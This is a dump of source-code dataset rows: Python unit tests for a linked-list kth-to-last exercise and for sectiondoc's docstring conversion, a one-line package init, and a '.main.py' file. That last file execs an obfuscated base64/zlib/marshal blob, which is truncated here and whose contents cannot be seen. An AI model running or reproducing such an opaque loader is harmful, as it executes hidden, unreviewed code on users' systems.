] | null | null | null | Problems/2/return_kth_to_last/test_kth_to_last.py | weezybusy/Cracking-the-Coding-Interview | 22b8f62c97781ea5aa388434d75ad5abde42c85a | [
"MIT"
] | null | null | null | Problems/2/return_kth_to_last/test_kth_to_last.py | weezybusy/Cracking-the-Coding-Interview | 22b8f62c97781ea5aa388434d75ad5abde42c85a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import unittest
from singly_linked_list import Node, SinglyLinkedList
from kth_to_last import kth_to_last, kth_to_last_alt, kth_to_last_recur
class TestKthToLast(unittest.TestCase):

    def test_kth_to_last(self):
        # Positive tests.
        lst = SinglyLinkedList()
        n = 4
        for i in range(n):
            lst.insert_tail(Node(i))
        for k in range(n):
            self.assertEqual(kth_to_last(lst, k).data, n - k - 1)

        # Negative tests.
        lst = SinglyLinkedList()
        n = 4
        for i in range(n):
            lst.insert_tail(Node(i))
        k = -1
        self.assertEqual(kth_to_last(lst, k), None)
        k = n
        self.assertEqual(kth_to_last(lst, k), None)

    def test_kth_to_last_alt(self):
        # Positive tests.
        lst = SinglyLinkedList()
        n = 4
        for i in range(n):
            lst.insert_tail(Node(i))
        for k in range(n):
            self.assertEqual(kth_to_last_alt(lst, k).data, n - k - 1)

        # Negative tests.
        lst = SinglyLinkedList()
        n = 4
        for i in range(n):
            lst.insert_tail(Node(i))
        k = -1
        self.assertEqual(kth_to_last_alt(lst, k), None)
        k = n
        self.assertEqual(kth_to_last_alt(lst, k), None)

    def test_kth_to_last_recur(self):
        # Positive tests.
        lst = SinglyLinkedList()
        n = 4
        for i in range(n):
            lst.insert_tail(Node(i))
        for k in range(n):
            self.assertEqual(kth_to_last_recur(lst, k).data, n - k - 1)

        # Negative tests.
        lst = SinglyLinkedList()
        n = 5
        for i in range(n):
            lst.insert_tail(Node(i))
        k = -1
        self.assertEqual(kth_to_last_recur(lst, k), None)
        k = n
        self.assertEqual(kth_to_last_recur(lst, k), None)


if __name__ == '__main__':
    unittest.main()
| 23.580247 | 71 | 0.559162 | 268 | 1,910 | 3.757463 | 0.164179 | 0.079444 | 0.142999 | 0.178749 | 0.806356 | 0.790467 | 0.790467 | 0.790467 | 0.750745 | 0.711023 | 0 | 0.010228 | 0.334555 | 1,910 | 80 | 72 | 23.875 | 0.782061 | 0.061257 | 0 | 0.745098 | 0 | 0 | 0.004479 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 1 | 0.058824 | false | 0 | 0.058824 | 0 | 0.137255 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
95a8aa9bc6ffebc51fed1dd76bea56e032a0c36e | 12,156 | py | Python | sectiondoc/tests/test_default_style.py | itziakos/sectiondoc | 427819d60125a2501b4e8e2eac94dee11931dc0c | [
"BSD-3-Clause"
] | null | null | null | sectiondoc/tests/test_default_style.py | itziakos/sectiondoc | 427819d60125a2501b4e8e2eac94dee11931dc0c | [
"BSD-3-Clause"
] | 15 | 2015-02-12T16:04:02.000Z | 2020-11-09T13:53:35.000Z | sectiondoc/tests/test_default_style.py | itziakos/sectiondoc | 427819d60125a2501b4e8e2eac94dee11931dc0c | [
"BSD-3-Clause"
] | 1 | 2019-08-02T09:56:48.000Z | 2019-08-02T09:56:48.000Z | from sectiondoc.styles.default import class_section, function_section
from sectiondoc.tests._compat import unittest
class TestDefaultStyleClass(unittest.TestCase):

    def setUp(self):
        self.maxDiff = None
docstring =\
"""Base abstract docstring refactoring class.
The class' main purpose is to parse the dosctring and find the
sections that need to be refactored. It also provides a number of
methods to help with the refactoring. Subclasses should provide
the methods responsible for refactoring the sections.
Attributes
----------
docstring : list
A list of strings (lines) that holds docstrings
index : int
The current zero-based line number of the docstring that is
proccessed.
"""
rst = \
"""Base abstract docstring refactoring class.
The class' main purpose is to parse the dosctring and find the
sections that need to be refactored. It also provides a number of
methods to help with the refactoring. Subclasses should provide
the methods responsible for refactoring the sections.
.. attribute:: docstring
:annotation: = list
A list of strings (lines) that holds docstrings
.. attribute:: index
:annotation: = int
The current zero-based line number of the docstring that is
proccessed.
"""
docstring_lines = docstring.splitlines()
class_doc = class_section(docstring_lines)
class_doc.parse()
output = '\n'.join(docstring_lines)
self.assertMultiLineEqual(rst, output)
    def test_refactor_methods(self):
        docstring = \
            """ This is a sample class docstring

            Methods
            -------
            extract_fields(indent='', field_check=None)
                Extract the fields from the docstring
            get_field()
                Get the field description.
            get_next_paragraph()
                Get the next paragraph designated by an empty line.
            """

        rst = \
            """ This is a sample class docstring

            ==================================================================== ===================================================
            Method                                                               Description
            ==================================================================== ===================================================
            :meth:`extract_fields(indent='', field_check=None) <extract_fields>` Extract the fields from the docstring
            :meth:`get_field() <get_field>`                                      Get the field description.
            :meth:`get_next_paragraph() <get_next_paragraph>`                    Get the next paragraph designated by an empty line.
            ==================================================================== ===================================================
            """  # noqa

        docstring_lines = docstring.splitlines()
        class_doc = class_section(docstring_lines)
        class_doc.parse()
        output = '\n'.join(docstring_lines)
        self.assertMultiLineEqual(rst, output)
    def test_refactor_notes(self):
        docstring1 = \
            """ This is a sample class docstring

            Notes
            -----
            This is the test.
            Wait we have not finished.

            This is not a note.
            """

        docstring2 = \
            """ This is a sample class docstring

            Notes
            -----
            This is the test.
            Wait we have not finished.

            This is not a note.

            """

        rst = \
            """ This is a sample class docstring

            .. note::
                This is the test.
                Wait we have not finished.

            This is not a note.
            """

        docstring_lines = docstring1.splitlines()
        class_doc = class_section(docstring_lines)
        class_doc.parse()
        output = '\n'.join(docstring_lines) + '\n'
        self.assertMultiLineEqual(rst, output)

        docstring_lines = docstring2.splitlines()
        class_doc = class_section(docstring_lines)
        class_doc.parse()
        output = '\n'.join(docstring_lines) + '\n'
        self.assertMultiLineEqual(rst, output)

class TestDefaultStyleFunction(unittest.TestCase):

    def setUp(self):
        self.maxDiff = None
    def test_refactor_returns(self):
        docstring = \
            """ This is a sample function docstring.

            Returns
            -------
            myvalue : list
                A list of important values.

                But we need to say more things about it.
            """

        rst = \
            """ This is a sample function docstring.

            :returns:
                **myvalue** (*list*) --
                A list of important values.

                But we need to say more things about it.
            """

        docstring_lines = docstring.splitlines()
        function_doc = function_section(docstring_lines)
        function_doc.parse()
        output = '\n'.join(docstring_lines)
        self.assertMultiLineEqual(rst, output)
    def test_refactor_raises(self):
        docstring = \
            """ This is a sample function docstring.

            Raises
            ------
            TypeError
                This is the first paragraph of the description.

                More description.
            ValueError
                Description of another case where errors are raised.
            """

        rst = \
            """ This is a sample function docstring.

            :raises:
                - **TypeError** --
                  This is the first paragraph of the description.

                  More description.
                - **ValueError** --
                  Description of another case where errors are raised.
            """

        docstring_lines = docstring.splitlines()
        function_doc = function_section(docstring_lines)
        function_doc.parse()
        output = '\n'.join(docstring_lines)
        self.assertMultiLineEqual(rst, output)
    def test_refactor_arguments(self):
        docstring = \
            """ This is a sample function docstring

            Arguments
            ---------
            inputa : str
                The first argument holds the first input!.

                This is the second paragraph.
            inputb : float
                The second argument is a float.
                the default value is 0.

                .. note:: this is an optional value.
            """

        rst = \
            """ This is a sample function docstring

            :param inputa:
                The first argument holds the first input!.

                This is the second paragraph.
            :type inputa: str
            :param inputb:
                The second argument is a float.
                the default value is 0.

                .. note:: this is an optional value.
            :type inputb: float
            """

        docstring_lines = docstring.splitlines()
        function_doc = function_section(docstring_lines)
        function_doc.parse()
        output = '\n'.join(docstring_lines) + '\n'
        self.assertMultiLineEqual(rst, output)
    def test_refactor_strange_arguments(self):
        docstring = \
            """ This is a sample function docstring

            Parameters
            ----------
            *args
                Positional arguments with which this constructor was called
                from the enaml source code.
            **kwards
                Keyword arguments with which this constructor was called
                from the enaml source code.
            from_
                Arguments with trailing underscore.
            """

        rst = \
            """ This is a sample function docstring

            :param \*args:
                Positional arguments with which this constructor was called
                from the enaml source code.
            :param \*\*kwards:
                Keyword arguments with which this constructor was called
                from the enaml source code.
            :param from\_:
                Arguments with trailing underscore.
            """

        docstring_lines = docstring.splitlines()
        function_doc = function_section(docstring_lines)
        function_doc.parse()
        output = '\n'.join(docstring_lines) + '\n'
        self.assertMultiLineEqual(rst, output)
    def test_refactor_notes(self):
        docstring = \
            """ This is a sample function docstring.

            Notes
            -----
            This is the test.
            Wait we have not finished.

            This should not be included.
            """

        rst = \
            """ This is a sample function docstring.

            .. note::
                This is the test.
                Wait we have not finished.

            This should not be included.
            """

        docstring_lines = docstring.splitlines()
        function_doc = function_section(docstring_lines)
        function_doc.parse()
        output = '\n'.join(docstring_lines) + '\n'
        self.assertMultiLineEqual(rst, output)
    def test_docstring_cases_1(self):
        docstring1 = \
            """ Sets the selection to the bounds of start and end.

            If the indices are invalid, no selection will be made,
            and any current selection will be cleared.

            Arguments
            ---------
            start : Int
                The start selection index, zero based.

            end : Int
                The end selection index, zero based.

            Returns
            -------
            result : None
            """

        docstring2 = \
            """ Sets the selection to the bounds of start and end.

            If the indices are invalid, no selection will be made,
            and any current selection will be cleared.

            Arguments
            ---------
            start : Int
                The start selection index, zero based.
            end : Int
                The end selection index, zero based.

            Returns
            -------
            result : None
            """

        rst = \
            """ Sets the selection to the bounds of start and end.

            If the indices are invalid, no selection will be made,
            and any current selection will be cleared.

            :param start:
                The start selection index, zero based.
            :type start: Int
            :param end:
                The end selection index, zero based.
            :type end: Int

            :returns:
                **result** (*None*)
            """

        docstring_lines = docstring1.splitlines()
        function_doc = function_section(docstring_lines)
        function_doc.parse()
        output = '\n'.join(docstring_lines)
        self.assertMultiLineEqual(rst, output)

        docstring_lines = docstring2.splitlines()
        function_doc = function_section(docstring_lines)
        function_doc.parse()
        output = '\n'.join(docstring_lines)
        self.assertMultiLineEqual(rst, output)
    def test_docstring_cases_2(self):
        docstring = \
            """ Verify that the requested attribute is properly set

            The method compares the attribute value in the Enaml object and
            check if it is synchronized with the toolkit widget. The component
            attribute is retrieved directly while the widget value is retrieved
            through a call to a method function in the test case.

            Arguments
            ---------
            component : enaml.widgets.component.Component
                The Enaml component to check.
            attribute_name : str
                The string name of the Enaml attribute to check.
            value
                The expected value.

            .. note:: It is expected that the user has defined an appropriate
                method get_<attribute_name>(widget) or the extentded version
                get_<attribute_name>(component, widget) in the current test
                case. The extended signature is commonly used because additional
                information on the component's attributes is required to return
                a sensible result (e.g. the component uses Converters to set
                and retrieve the value of the attribute). The assert method
                The get methods can raise assertion errors when it is not
                possible to retrieve a sensible value for the attribute.
            """

        rst = \
            """ Verify that the requested attribute is properly set

            The method compares the attribute value in the Enaml object and
            check if it is synchronized with the toolkit widget. The component
            attribute is retrieved directly while the widget value is retrieved
            through a call to a method function in the test case.

            :param component:
                The Enaml component to check.
            :type component: enaml.widgets.component.Component
            :param attribute_name:
                The string name of the Enaml attribute to check.
            :type attribute_name: str
            :param value:
                The expected value.

            .. note:: It is expected that the user has defined an appropriate
                method get_<attribute_name>(widget) or the extentded version
                get_<attribute_name>(component, widget) in the current test
                case. The extended signature is commonly used because additional
                information on the component's attributes is required to return
                a sensible result (e.g. the component uses Converters to set
                and retrieve the value of the attribute). The assert method
                The get methods can raise assertion errors when it is not
                possible to retrieve a sensible value for the attribute.
            """

        docstring_lines = docstring.splitlines()
        function_doc = function_section(docstring_lines)
        function_doc.parse()
        output = '\n'.join(docstring_lines) + '\n'
        self.assertMultiLineEqual(rst, output)
if __name__ == '__main__':
unittest.main()
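The test above checks a numpydoc-style `Arguments` section being rewritten into reST `:param:`/`:type:` fields. As an illustration of that transformation, here is a minimal standalone sketch; `args_to_rst` is a hypothetical helper, not enaml's actual `function_section` parser:

```python
def args_to_rst(lines):
    """Rewrite a numpydoc-style 'Arguments' section into reST
    :param:/:type: fields (hypothetical helper, for illustration)."""
    out = []
    i = 0
    while i < len(lines):
        if lines[i].strip() == 'Arguments':
            i += 2  # skip the header and its '---------' underline
            while i < len(lines) and lines[i] and not lines[i].startswith(' '):
                header = lines[i]
                i += 1
                desc = []
                while i < len(lines) and lines[i].startswith(' '):
                    desc.append(lines[i].strip())
                    i += 1
                if ' : ' in header:  # 'name : type' form
                    name, type_ = header.split(' : ', 1)
                    out.append(':param %s:' % name)
                    out.extend('    ' + d for d in desc)
                    out.append(':type %s: %s' % (name, type_))
                else:  # bare 'name' form
                    out.append(':param %s:' % header)
                    out.extend('    ' + d for d in desc)
        else:
            out.append(lines[i])
            i += 1
    return out
```

A full parser would also need to cover other section types; this sketch handles only the argument fields exercised by the fixture.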
# === scipy_cut_tree_balanced/__init__.py (vreyespue/scipy_cut_tree_balanced, BSD-3-Clause) ===

from scipy_cut_tree_balanced.util import cut_tree_balanced
# === .main.py (BotolMehedi/b08, MIT) ===

# Encrypt by Botol Baba
# Github : https://github.com/BotolMehedi
# Facebook : https://facebook.com/TheMehtan
# Youtube : https://youtube.com/MasterTrick1
import marshal,zlib,base64
exec(marshal.loads(zlib.decompress(base64.b64decode("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